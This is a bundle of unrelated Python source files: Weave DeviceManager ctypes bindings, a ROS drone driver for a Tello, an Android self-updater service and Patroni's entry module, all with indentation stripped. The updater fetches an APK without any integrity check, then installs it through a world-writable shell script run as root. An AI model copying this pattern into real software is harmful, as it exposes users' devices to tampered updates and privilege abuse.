_dmLib.nl_Weave_DeviceManager_EnableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_EnableNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DisableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_DisableNetwork.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetRendezvousMode.argtypes = [ c_void_p, _GetRendezvousModeCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetRendezvousMode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetRendezvousMode.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_SetRendezvousMode.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_CreateFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_CreateFabric.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_LeaveFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_LeaveFabric.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_GetFabricConfig.argtypes = [ c_void_p, _GetFabricConfigCompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_GetFabricConfig.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_JoinExistingFabric.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_JoinExistingFabric.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_Ping.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_Ping.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.argtypes = [ c_void_p, c_char_p, c_char_p ]
_dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetConnectTimeout.argtypes = [ c_void_p, c_uint32 ]
_dmLib.nl_Weave_DeviceManager_SetConnectTimeout.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetAutoReconnect.argtypes = [ c_void_p, c_bool ]
_dmLib.nl_Weave_DeviceManager_SetAutoReconnect.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.argtypes = [ c_void_p, c_bool ]
_dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, c_void_p, c_uint32, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UpdateService.argtypes = [ c_void_p, c_uint64, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UpdateService.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_UnregisterService.argtypes = [ c_void_p, c_uint64, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_UnregisterService.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ArmFailSafe.argtypes = [ c_void_p, c_uint8, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ArmFailSafe.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_DisarmFailSafe.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_DisarmFailSafe.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ResetConfig.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_ResetConfig.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_ErrorToString.argtypes = [ c_uint32 ]
_dmLib.nl_Weave_DeviceManager_ErrorToString.restype = c_char_p
_dmLib.nl_Weave_DeviceManager_StatusReportToString.argtypes = [ c_uint32, c_uint16 ]
_dmLib.nl_Weave_DeviceManager_StatusReportToString.restype = c_char_p
_dmLib.nl_Weave_DeviceManager_GetLogFilter.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_GetLogFilter.restype = c_uint8
_dmLib.nl_Weave_DeviceManager_SetLogFilter.argtypes = [ c_uint8 ]
_dmLib.nl_Weave_DeviceManager_SetLogFilter.restype = None
_dmLib.nl_Weave_DeviceManager_CloseEndpoints.argtypes = [ ]
_dmLib.nl_Weave_DeviceManager_CloseEndpoints.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_StartSystemTest.argtypes = [ c_void_p, c_uint32, c_uint32, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_StartSystemTest.restype = c_uint32
_dmLib.nl_Weave_DeviceManager_StopSystemTest.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
_dmLib.nl_Weave_DeviceManager_StopSystemTest.restype = c_uint32
res = _dmLib.nl_Weave_DeviceManager_Init()
if (res != 0):
raise self._ErrorToException(res)
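# The two helpers below are the synchronous/asynchronous call shims used by
# the binding methods: _CallDevMgr simply runs a library call under the
# network lock, while _CallDevMgrAsync additionally spins on completeEvent
# (pumping the optional blockingCB) until a C callback deposits the result,
# or an exception, into callbackRes.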
def _CallDevMgr(self, callFunct):
# TODO: raise an error if an operation is already in progress
self.callbackRes = None
self.completeEvent.clear()
with self.networkLock:
res = callFunct()
self.completeEvent.set()
return res
def _CallDevMgrAsync(self, callFunct):
# TODO: raise an error if an operation is already in progress
self.callbackRes = None
self.completeEvent.clear()
with self.networkLock:
res = callFunct()
if (res != 0):
self.completeEvent.set()
raise self._ErrorToException(res)
while (not self.completeEvent.isSet()):
if self.blockingCB:
self.blockingCB()
self.completeEvent.wait(0.05)
if (isinstance(self.callbackRes, DeviceManagerException)):
raise self.callbackRes
return self.callbackRes
def _ErrorToException(self, err, devStatusPtr=None):
if (err == 4044 and devStatusPtr):  # 4044: error carrying a device status report
devStatus = devStatusPtr.contents
msg = _CStringToString(_dmLib.nl_Weave_DeviceManager_StatusReportToString(devStatus.ProfileId, devStatus.StatusCode))
sysErrorCode = devStatus.SysErrorCode if (devStatus.SysErrorCode != 0) else None
if (sysErrorCode != None):
msg = msg + " (system err %d)" % (sysErrorCode)
return DeviceError(devStatus.ProfileId, devStatus.StatusCode, sysErrorCode, msg)
else:
return DeviceManagerError(err, _CStringToString(_dmLib.nl_Weave_DeviceManager_ErrorToString(err)))
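# A hypothetical binding method in the style the helpers above support; a
# sketch only, with attribute names (devMgr, cbHandleComplete, cbHandleError)
# assumed for illustration rather than taken from the original class:
#
#   def Ping(self):
#       return self._CallDevMgrAsync(
#           lambda: _dmLib.nl_Weave_DeviceManager_Ping(
#               self.devMgr, self.cbHandleComplete, self.cbHandleError))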
def NetworkTypeToString(val):
if (val == NetworkType_WiFi):
return "WiFi"
if (val == NetworkType_Thread):
return "Thread"
if (val != None):
return "UNKNOWN (" + str(val)+ ")"
return None
def ParseNetworkType(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "wifi"):
return NetworkType_WiFi
if (val == "thread"):
return NetworkType_Thread
raise Exception("Invalid network type: " + str(val))
def WiFiModeToString(val):
if (val == WiFiMode_AdHoc):
return "AdHoc"
if (val == WiFiMode_Managed):
return "Managed"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiMode(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "adhoc" or val == "ad-hoc"):
return WiFiMode_AdHoc
if (val == "managed"):
return WiFiMode_Managed
raise Exception("Invalid Wifi mode: " + str(val))
def WiFiRoleToString(val):
if (val == WiFiRole_Station):
return "Station"
if (val == WiFiRole_AccessPoint):
return "AccessPoint"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiRole(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "station"):
return WiFiRole_Station
if (val == "accesspoint" or val == "access-point"):
return WiFiRole_AccessPoint
raise Exception("Invalid Wifi role: " + str(val))
def WiFiSecurityTypeToString(val):
if (val == WiFiSecurityType_None):
return "None"
if (val == WiFiSecurityType_WEP):
return "WEP"
if (val == WiFiSecurityType_WPAPersonal):
return "WPA"
if (val == WiFiSecurityType_WPA2Personal):
return "WPA2"
if (val == WiFiSecurityType_WPA2MixedPersonal):
return "WPA2Mixed"
if (val == WiFiSecurityType_WPAEnterprise):
return "WPAEnterprise"
if (val == WiFiSecurityType_WPA2Enterprise):
return "WPA2Enterprise"
if (val == WiFiSecurityType_WPA2MixedEnterprise):
return "WPA2MixedEnterprise"
if (val != None):
return "Unknown (" + str(val)+ ")"
return None
def ParseSecurityType(val):
val = val.lower()
if (val == 'none'):
return WiFiSecurityType_None
if (val == 'wep'):
return WiFiSecurityType_WEP
if (val == 'wpa' or val == 'wpapersonal' or val == 'wpa-personal'):
return WiFiSecurityType_WPAPersonal
if (val == 'wpa2' or val == 'wpa2personal' or val == 'wpa2-personal'):
return WiFiSecurityType_WPA2Personal
if (val == 'wpa2mixed' or val == 'wpa2-mixed' or val == 'wpa2mixedpersonal' or val == 'wpa2-mixed-personal'):
return WiFiSecurityType_WPA2MixedPersonal
if (val == 'wpaenterprise' or val == 'wpa-enterprise'):
return WiFiSecurityType_WPAEnterprise
if (val == 'wpa2enterprise' or val == 'wpa2-enterprise'):
return WiFiSecurityType_WPA2Enterprise
if (val == 'wpa2mixedenterprise' or val == 'wpa2-mixed-enterprise'):
return WiFiSecurityType_WPA2MixedEnterprise
raise Exception("Invalid Wifi security type: " + str(val))
def DeviceFeatureToString(val):
if (val == DeviceFeature_HomeAlarmLinkCapable):
return "HomeAlarmLinkCapable"
if (val == DeviceFeature_LinePowered):
return "LinePowered"
return "0x%08X" % (val)
|
drivers.py
|
#!/usr/bin/env python
# ROS utilities
import threading
import rospy
from geometry_msgs.msg import Point, Pose, Quaternion, Twist
from sensor_msgs.msg import Image, CompressedImage, Imu
from std_msgs.msg import Empty
from tello_msgs.msg import FlightData
from cv_bridge import CvBridge, CvBridgeError
from nav_msgs.msg import Odometry
from tf.transformations import euler_from_quaternion, quaternion_from_euler
#Python Utilities
import av
import cv2
import numpy as np
import tellopy
from copy import deepcopy
from math import *
import time
import pygame
import pygame.locals
fpv = [960, 720]
# Helpers
from helpers.control import Control
control = Control()
from helpers.rc import JoystickPS4
ps4_js = JoystickPS4()
from helpers.cvlib import Detection
detection = Detection()
buttons = None
speed = 100
throttle = 0.0
yaw = 0.0
pitch = 0.0
roll = 0.0
class TelloDriver(object):
def __init__(self):
# Connect to the drone
self._drone = tellopy.Tello()
self._drone.connect()
self._drone.wait_for_connection(10.0)
# Init
rospy.init_node('tello_driver_node', anonymous=False)
self.current_yaw = 0.0
self.rate = rospy.Rate(30)
self._cv_bridge = CvBridge()
self.pose = Pose()
self.frame = None
self.centroids = []
self.drone_position = None
self.height = 0
# ROS publishers
self._flight_data_pub = rospy.Publisher('/tello/flight_data', FlightData, queue_size=10)
self._image_pub = rospy.Publisher('/tello/camera/image_raw', Image, queue_size=10)
self.pub_odom = rospy.Publisher('/tello/odom', Odometry, queue_size=10, latch=True)
self.pub_imu= rospy.Publisher('/tello/imu', Imu, queue_size=10, latch=True)
# ROS subscribers
self._drone.subscribe(self._drone.EVENT_FLIGHT_DATA, self.flight_data_callback)
self._drone.subscribe(self._drone.EVENT_LOG_DATA, self.cb_data_log)
#rospy.Subscriber("/aiming/target_point", Point, self.point_callback)
# Drone takeoff (currently disabled)
#self._drone.takeoff()
#Drone controller PS4
global buttons
pygame.init()
pygame.joystick.init()
try:
js = pygame.joystick.Joystick(0)
js.init()
js_name = js.get_name()
buttons = ps4_js
except pygame.error:
pass
# Start video thread
self._stop_request = threading.Event()
video_thread = threading.Thread(target=self.video_worker)
video_thread.start()
rospy.on_shutdown(self.shutdown)
while not rospy.is_shutdown():
for e in pygame.event.get():
self.handle_input_event(self._drone, e)
if self.frame is not None:
start_time = time.time()
frame = deepcopy(self.frame)
self.centroids = detection.detect(frame)
if len(self.centroids)==0:
continue
else:
cent = self.centroids[0]
rospy.loginfo('cent %s', cent)
yaw_angle = control.yaw(cent)
try:
rospy.loginfo('yaw_angle %s', yaw_angle)
self._drone.clockwise(yaw_angle)
#self.pose.position = drone_position
#self.pose.orientation = Quaternion(*quaternion_from_euler(0.0, 0.0, yaw_angle*pi/180))
#print(self.pose)
#self.pub_odom.pose.publish(self.pose)
except rospy.ServiceException:
pass
cv2.circle(frame, (480, cent[1]), 3, [0,0,255], -1, cv2.LINE_AA) #red
cv2.circle(frame, (cent[0], cent[1]), 3, [0,255,0], -1, cv2.LINE_AA) #green
cv2.imshow("", frame)
cv2.waitKey(1)
#print("%s seconds" % (time.time() - start_time))
#time.sleep((time.time() - start_time)) # slows the loop down twice over - don't do it
self.rate.sleep()
def video_worker(self):
container = av.open(self._drone.get_video_stream())
rospy.loginfo('starting video pipeline')
for frame in container.decode(video=0):
try:
color_mat = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_RGB2BGR)
self._image_pub.publish(self._cv_bridge.cv2_to_imgmsg(color_mat, 'bgr8'))
except CvBridgeError as e:
print(e)
self.frame = color_mat
if self._stop_request.isSet():
return
#def point_callback(self,data):
# self.centroids = [int(data.x), int(data.y)]
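# Raw Tello telemetry uses decimeter-based units, and values above 30000
# appear to be the firmware's "not available" sentinel; the callback below
# maps sentinels to -1 and divides the remaining values by 10.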
def flight_data_callback(self, event, sender, data, **args):
flight_data = FlightData()
flight_data.battery_percent = data.battery_percentage
flight_data.estimated_flight_time_remaining = data.drone_fly_time_left / 10.
flight_data.flight_mode = data.fly_mode
flight_data.flight_time = data.fly_time
flight_data.east_speed = -1. if data.east_speed > 30000 else data.east_speed / 10.
flight_data.north_speed = -1. if data.north_speed > 30000 else data.north_speed / 10.
flight_data.ground_speed = -1. if data.ground_speed > 30000 else data.ground_speed / 10.
flight_data.altitude = -1. if data.height > 30000 else data.height / 10.
flight_data.equipment = data.electrical_machinery_state
flight_data.high_temperature = data.temperature_height
self._flight_data_pub.publish(flight_data)
def shutdown(self):
self._stop_request.set()
self._drone.land()
self._drone.quit()
self._drone = None
def cb_data_log(self, event, sender, data, **args):
time_cb = rospy.Time.now()
odom_msg = Odometry()
odom_msg.child_frame_id = rospy.get_namespace() + 'base_link'
odom_msg.header.stamp = time_cb
odom_msg.header.frame_id = rospy.get_namespace() + 'local_origin'
# Height from MVO received as negative distance to floor
odom_msg.pose.pose.position.z = -data.mvo.pos_z #self.height #-data.mvo.pos_z
odom_msg.pose.pose.position.x = data.mvo.pos_x
odom_msg.pose.pose.position.y = data.mvo.pos_y
odom_msg.pose.pose.orientation.w = data.imu.q0
odom_msg.pose.pose.orientation.x = data.imu.q1
odom_msg.pose.pose.orientation.y = data.imu.q2
odom_msg.pose.pose.orientation.z = data.imu.q3
#self.drone_position = odom_msg.pose.pose.position
# Linear speeds from MVO received in dm/sec
odom_msg.twist.twist.linear.x = data.mvo.vel_y/10
odom_msg.twist.twist.linear.y = data.mvo.vel_x/10
odom_msg.twist.twist.linear.z = -data.mvo.vel_z/10
odom_msg.twist.twist.angular.x = data.imu.gyro_x
odom_msg.twist.twist.angular.y = data.imu.gyro_y
odom_msg.twist.twist.angular.z = data.imu.gyro_z
self.pub_odom.publish(odom_msg)
imu_msg = Imu()
imu_msg.header.stamp = time_cb
imu_msg.header.frame_id = rospy.get_namespace() + 'base_link'
imu_msg.orientation.w = data.imu.q0
imu_msg.orientation.x = data.imu.q1
imu_msg.orientation.y = data.imu.q2
imu_msg.orientation.z = data.imu.q3
imu_msg.angular_velocity.x = data.imu.gyro_x
imu_msg.angular_velocity.y = data.imu.gyro_y
imu_msg.angular_velocity.z = data.imu.gyro_z
imu_msg.linear_acceleration.x = data.imu.acc_x
imu_msg.linear_acceleration.y = data.imu.acc_y
imu_msg.linear_acceleration.z = data.imu.acc_z
self.pub_imu.publish(imu_msg)
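# update() is a simple jump filter for joystick axes: a new value is accepted
# only if it differs from the previous one by at most max_delta; larger jumps
# (e.g. a controller glitch or reconnect) reset the control to 0.0.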
def update(self,old, new, max_delta=0.3):
if abs(old - new) <= max_delta:
res = new
else:
res = 0.0
return res
def handle_input_event(self, drone, e):
global speed
global throttle
global yaw
global pitch
global roll
if e.type == pygame.locals.JOYAXISMOTION:
# ignore small input values (Deadzone)
if -buttons.DEADZONE <= e.value and e.value <= buttons.DEADZONE:
e.value = 0.0
if e.axis == buttons.LEFT_Y:
throttle = self.update(throttle, e.value * buttons.LEFT_Y_REVERSE)
drone.set_throttle(throttle)
if e.axis == buttons.LEFT_X:
yaw = self.update(yaw, e.value * buttons.LEFT_X_REVERSE)
drone.set_yaw(yaw)
if e.axis == buttons.RIGHT_Y:
pitch = self.update(pitch, e.value * buttons.RIGHT_Y_REVERSE)
drone.set_pitch(pitch)
if e.axis == buttons.RIGHT_X:
roll = self.update(roll, e.value * buttons.RIGHT_X_REVERSE)
drone.set_roll(roll)
elif e.type == pygame.locals.JOYHATMOTION:
if e.value[0] < 0:
drone.counter_clockwise(speed)
if e.value[0] == 0:
drone.clockwise(0)
if e.value[0] > 0:
drone.clockwise(speed)
if e.value[1] < 0:
drone.down(speed)
if e.value[1] == 0:
drone.up(0)
if e.value[1] > 0:
drone.up(speed)
elif e.type == pygame.locals.JOYBUTTONDOWN:
if e.button == buttons.LAND:
drone.land()
elif e.button == buttons.UP:
drone.up(speed)
elif e.button == buttons.DOWN:
drone.down(speed)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(speed)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(speed)
elif e.button == buttons.FORWARD:
drone.forward(speed)
elif e.button == buttons.BACKWARD:
drone.backward(speed)
elif e.button == buttons.RIGHT:
drone.right(speed)
elif e.button == buttons.LEFT:
drone.left(speed)
elif e.type == pygame.locals.JOYBUTTONUP:
if e.button == buttons.TAKEOFF:
if throttle != 0.0:
print('###')
print('### throttle != 0.0 (This may hinder the drone from taking off)')
print('###')
drone.takeoff()
elif e.button == buttons.UP:
drone.up(0)
elif e.button == buttons.DOWN:
drone.down(0)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(0)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(0)
elif e.button == buttons.FORWARD:
drone.forward(0)
elif e.button == buttons.BACKWARD:
drone.backward(0)
elif e.button == buttons.RIGHT:
drone.right(0)
elif e.button == buttons.LEFT:
drone.left(0)
def main():
try:
TelloDriver()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
service.py
|
import os
import traceback
import urllib2
from threading import Thread, Event
from time import sleep, time
from jnius import autoclass
import subprocess
from kivy.lib import osc
from pyupdater import SERVICE_PORT, CLIENT_PORT, SERVICE_PATH, MESSAGE_UPDATE_AVAILABLE, MESSAGE_DO_UPDATE, \
MESSAGE_CHECK_FOR_UPDATE
from pyupdater.util import get_current_version, mContext, check_for_root
Environment = autoclass('android.os.Environment')
Intent = autoclass('android.content.Intent')
Uri = autoclass('android.net.Uri')
File = autoclass('java.io.File')
class UpdateFailedException(Exception):
def __init__(self, output):
reason = 'FAILED'
if isinstance(output, basestring):
output = output.strip()
if output[-1] == ']' and '[' in output:
reason = output[output.rindex('[') + 1:-1]
else:
output = str(output)
self.output = output
self.reason = reason
super(UpdateFailedException, self).__init__(reason)
class Updater(object):
def __init__(self, updateurl, frequency=600, root='available', restart=True, root_scriptdir='/cache',
restart_activity='org.renpy.android.PythonActivity'):
print 'updater init'
self.updateurl = updateurl
self.dlthread = None
self.dlready = Event()
self.available_version = None
self.available_version_number = ''
self.current_version = None
self.downloaded_version = None
self.frequency = frequency
self.last_check = None
self.downloadurl = None
self.downloadfile = None
self.root = root if root == 'available' else bool(root)
self.restart = bool(restart)
self.root_scriptdir = root_scriptdir
self.restart_activity = restart_activity
def get_current_version(self):
print 'getting current version...'
version_code = get_current_version()
print 'current version =', version_code
return version_code
def run(self):
print 'updater run'
osc.init()
oscid = osc.listen('127.0.0.1', SERVICE_PORT)
osc.bind(oscid, self.recv_osc, SERVICE_PATH)
print 'listening for OSC'
self.current_version = self.downloaded_version = self.get_current_version()
while True:
if not self.last_check or (self.last_check + self.frequency) < time():
if self.check_for_update():
self.download_update()
if self.dlready.is_set():
self.notify_client()
self.dlready.clear()
osc.readQueue(oscid)
sleep(.1)
def check_for_update(self):
try:
print 'checking for updates at', self.updateurl
print 'last checked:', str(self.last_check)
response = urllib2.urlopen(self.updateurl)
version_code, version_number, dlurl = response.read().split(',')
response.close()
self.available_version = int(version_code)
self.available_version_number = version_number
self.downloadurl = dlurl
print 'found version', self.available_version, '(current version %d)' % self.current_version
return self.available_version > self.downloaded_version
except Exception:
print 'check for update failed!'
traceback.print_exc()
return False
finally:
self.last_check = time()
print 'update last checked:', str(self.last_check)
def download_update(self):
if self.dlthread and self.dlthread.is_alive():
print 'download already in progress!'
return
print 'starting download in thread'
self.dlthread = Thread(name='dlthread', target=self._download)
self.dlthread.start()
def _download(self):
fd = None
print 'downloading', self.downloadurl
self.dlready.clear()
try:
response = urllib2.urlopen(self.downloadurl)
update = response.read()
response.close()
dlfile = os.path.join(Environment.getExternalStorageDirectory().getPath(), 'py4aupdate.apk')
with open(dlfile, 'w') as f:
f.write(update)
self.downloadfile = dlfile
print 'download successful'
self.downloaded_version = self.available_version
self.dlready.set()
except Exception:
print 'download failed!'
traceback.print_exc()
def notify_client(self):
osc.sendMsg(SERVICE_PATH, [MESSAGE_UPDATE_AVAILABLE, self.available_version, self.available_version_number], port=CLIENT_PORT)
def recv_osc(self, message, *args):
print 'service osc message:', message, args
command = message[2]
if command == MESSAGE_DO_UPDATE:
self.update()
elif command == MESSAGE_CHECK_FOR_UPDATE:
if self.check_for_update():
self.download_update()
def update(self, ignore_exceptions=False):
if not self.available_version:
print 'no updates found!'
return
if not self.downloadfile:
print 'update not downloaded!'
return
print 'starting update to', self.available_version, 'from', self.downloadfile
try:
if self.root and self.root_binary:
self.root_install()
elif self.root is True:
raise UpdateFailedException('root not available')
else:
self.normal_install()
except Exception:
if ignore_exceptions:
print 'update failed'
traceback.print_exc()
else:
raise
def normal_install(self):
print 'performing standard install'
dluri = Uri.fromFile(File(self.downloadfile))
intent = Intent(Intent.ACTION_VIEW)
intent.setDataAndType(dluri, 'application/vnd.android.package-archive')
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
mContext().startActivity(intent)
def run_root(self, cmdline):
cmd = [self.root_binary, '-c', cmdline]
print 'running', cmd
return subprocess.check_output(cmd)
def root_install(self):
print 'performing root install'
scriptfilesd = os.path.join(Environment.getExternalStorageDirectory().getPath(), 'py4aupdate.sh')
scriptfile = os.path.join('/cache', 'py4aupdate.sh')
with open(scriptfilesd, 'w') as f:
f.write('(pm install -r %s | tee /proc/self/fd/2 | grep -q Success) 2>&1 || exit 1\n' % self.downloadfile)
f.write('rm -f %s\n' % self.downloadfile)
f.write('rm -f %s\n' % scriptfile)
if self.restart:
appname = mContext().getPackageName()
f.write('am start -n %s/%s\n' % (appname, self.restart_activity))
print self.run_root('cp %s %s' % (scriptfilesd, scriptfile))
print self.run_root('chmod 0777 %s' % scriptfile)
os.unlink(scriptfilesd)
try:
output = self.run_root('sh %s' % scriptfile)
# service should be killed on update, if we're still running it's an error
print 'install failed:'
print output
raise UpdateFailedException(output)
except UpdateFailedException:
raise
except Exception, e:
print 'install failed:'
if hasattr(e, 'output') and e.output:
print e.output
raise UpdateFailedException(e.output)
else:
traceback.print_exc()
print '(no command output)'
raise UpdateFailedException(e)
@property
def root_binary(self):
if not hasattr(self, '_root_binary'):
self._root_binary = check_for_root()
return self._root_binary
def restart_app(self):
print 'restarting app'
app = mContext()
context = app.getBaseContext()
intent = context.getPackageManager().getLaunchIntentForPackage(context.getPackageName())
intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP)
app.startActivity(intent)
print 'app activity launched'
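# A hypothetical client-side counterpart, sketched with the same kivy OSC
# calls this module already uses; the real client lives elsewhere and the
# handler below is illustrative only.
def _example_client_listener():
    osc.init()
    oscid = osc.listen('127.0.0.1', CLIENT_PORT)
    def on_message(message, *args):
        # mirrors Updater.recv_osc: payload items start at index 2
        if message[2] == MESSAGE_UPDATE_AVAILABLE:
            print 'update available:', message[3], message[4]
        # a client could reply with MESSAGE_DO_UPDATE to trigger the install:
        # osc.sendMsg(SERVICE_PATH, [MESSAGE_DO_UPDATE], port=SERVICE_PORT)
    osc.bind(oscid, on_message, SERVICE_PATH)
    return oscid  # the caller must pump osc.readQueue(oscid) periodically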
|
__init__.py
|
import logging
import os
import signal
import sys
import time
logger = logging.getLogger(__name__)
class Patroni(object):
def __init__(self):
from patroni.api import RestApiServer
from patroni.config import Config
from patroni.dcs import get_dcs
from patroni.ha import Ha
from patroni.log import PatroniLogger
from patroni.postgresql import Postgresql
from patroni.version import __version__
from patroni.watchdog import Watchdog
self.setup_signal_handlers()
self.version = __version__
self.logger = PatroniLogger()
self.config = Config()
self.logger.reload_config(self.config.get('log', {}))
self.dcs = get_dcs(self.config)
self.watchdog = Watchdog(self.config)
self.load_dynamic_configuration()
self.postgresql = Postgresql(self.config['postgresql'])
self.api = RestApiServer(self, self.config['restapi'])
self.ha = Ha(self)
self.tags = self.get_tags()
self.next_run = time.time()
self.scheduled_restart = {}
def load_dynamic_configuration(self):
from patroni.exceptions import DCSError
while True:
try:
cluster = self.dcs.get_cluster()
if cluster and cluster.config and cluster.config.data:
if self.config.set_dynamic_configuration(cluster.config):
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
elif not self.config.dynamic_configuration and 'bootstrap' in self.config:
if self.config.set_dynamic_configuration(self.config['bootstrap']['dcs']):
self.dcs.reload_config(self.config)
break
except DCSError:
logger.warning('Cannot get cluster from DCS')
time.sleep(5)
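# get_tags keeps every configured tag but drops the four boolean behavior
# tags (clonefrom/nofailover/noloadbalance/nosync) when falsy, so
# "nofailover: false" behaves exactly like an absent tag.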
def get_tags(self):
return {tag: value for tag, value in self.config.get('tags', {}).items()
if tag not in ('clonefrom', 'nofailover', 'noloadbalance', 'nosync') or value}
@property
def nofailover(self):
return bool(self.tags.get('nofailover', False))
@property
def nosync(self):
return bool(self.tags.get('nosync', False))
def reload_config(self):
try:
self.tags = self.get_tags()
self.logger.reload_config(self.config.get('log', {}))
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
self.api.reload_config(self.config['restapi'])
self.postgresql.reload_config(self.config['postgresql'])
except Exception:
logger.exception('Failed to reload config_file=%s', self.config.config_file)
@property
def replicatefrom(self):
return self.tags.get('replicatefrom')
def sighup_handler(self, *args):
self._received_sighup = True
def sigterm_handler(self, *args):
with self._sigterm_lock:
if not self._received_sigterm:
self._received_sigterm = True
sys.exit()
@property
def noloadbalance(self):
return bool(self.tags.get('noloadbalance', False))
def schedule_next_run(self):
self.next_run += self.dcs.loop_wait
current_time = time.time()
nap_time = self.next_run - current_time
if nap_time <= 0:
self.next_run = current_time
# Release the GIL so we don't starve anyone waiting on async_executor lock
time.sleep(0.001)
# Warn user that Patroni is not keeping up
logger.warning("Loop time exceeded, rescheduling immediately.")
elif self.ha.watch(nap_time):
self.next_run = time.time()
@property
def received_sigterm(self):
with self._sigterm_lock:
return self._received_sigterm
def run(self):
self.api.start()
self.next_run = time.time()
while not self.received_sigterm:
if self._received_sighup:
self._received_sighup = False
if self.config.reload_local_configuration():
self.reload_config()
logger.info(self.ha.run_cycle())
if self.dcs.cluster and self.dcs.cluster.config and self.dcs.cluster.config.data \
and self.config.set_dynamic_configuration(self.dcs.cluster.config):
self.reload_config()
if self.postgresql.role != 'uninitialized':
self.config.save_cache()
self.schedule_next_run()
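# Each heartbeat of run(): apply any SIGHUP-triggered local config reload,
# run one HA cycle, pick up dynamic (DCS-side) configuration changes, save
# the role cache for initialized clusters, then sleep via schedule_next_run
# until the next loop_wait boundary.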
def setup_signal_handlers(self):
from threading import Lock
self._received_sighup = False
self._sigterm_lock = Lock()
self._received_sigterm = False
if os.name != 'nt':
signal.signal(signal.SIGHUP, self.sighup_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
def shutdown(self):
with self._sigterm_lock:
self._received_sigterm = True
try:
self.api.shutdown()
except Exception:
logger.exception('Exception during RestApi.shutdown')
self.ha.shutdown()
def patroni_main():
patroni = Patroni()
try:
patroni.run()
except KeyboardInterrupt:
pass
finally:
patroni.shutdown()
logging.shutdown()
def main():
if os.getpid() != 1:
return patroni_main()
# Patroni was started with PID=1; it looks like we are running inside a container
pid = 0
# Looks like we are inside Docker, so act as a minimal init: reap children and forward signals
def sigchld_handler(signo, stack_frame):
try:
while True:
ret = os.waitpid(-1, os.WNOHANG)
if ret == (0, 0):
break
elif ret[0] != pid:
logger.info('Reaped pid=%s, exit status=%s', *ret)
except OSError:
pass
def passtochild(signo, stack_frame):
if pid:
os.kill(pid, signo)
if os.name != 'nt':
signal.signal(signal.SIGCHLD, sigchld_handler)
signal.signal(signal.SIGHUP, passtochild)
signal.signal(signal.SIGQUIT, passtochild)
